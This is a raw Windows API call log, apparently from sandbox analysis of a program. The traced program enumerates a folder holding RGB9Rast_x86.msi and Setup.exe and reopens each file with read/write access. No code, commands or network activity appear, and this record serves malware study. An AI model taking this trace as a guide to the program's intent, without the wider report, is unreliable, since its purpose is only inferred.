1 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.618] AreFileApisANSI () returned 1 [0068.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d478 [0068.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 39 [0068.619] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200)) returned 1 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.619] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0068.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0068.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.620] AreFileApisANSI () returned 1 [0068.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi", lpUsedDefaultChar=0x0) returned 39 [0068.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.620] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0068.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.620] AreFileApisANSI () returned 1 [0068.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d688 [0068.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 39 [0068.620] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.620] GetFileType (hFile=0x428) returned 0x1 [0068.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0068.621] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.621] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.621] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.621] CloseHandle (hObject=0x428) returned 1 [0068.621] AreFileApisANSI () returned 1 [0068.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d688 [0068.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 39 [0068.621] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.622] GetFileType (hFile=0x428) returned 0x1 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0068.622] CloseHandle (hObject=0x428) returned 1 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.623] AreFileApisANSI () returned 1 [0068.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d478 [0068.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 39 [0068.623] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200)) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.623] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0068.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0068.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0068.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0068.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0068.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0068.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0068.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.624] AreFileApisANSI () returned 1 [0068.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Setup.exe", lpUsedDefaultChar=0x0) returned 32 [0068.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0068.624] AreFileApisANSI () returned 1 [0068.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0068.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0068.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=32 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe") returned 32 [0068.625] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.625] GetFileType (hFile=0x428) returned 0x1 [0068.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0068.625] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.625] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.625] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.625] CloseHandle (hObject=0x428) returned 1 [0068.626] AreFileApisANSI () returned 1 [0068.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0068.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=32 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe") returned 32 [0068.626] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.626] GetFileType (hFile=0x428) returned 0x1 [0068.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.626] CloseHandle (hObject=0x428) returned 1 [0068.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0068.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0068.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0068.627] AreFileApisANSI () returned 1 [0068.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0068.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=32 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe") returned 32 [0068.627] 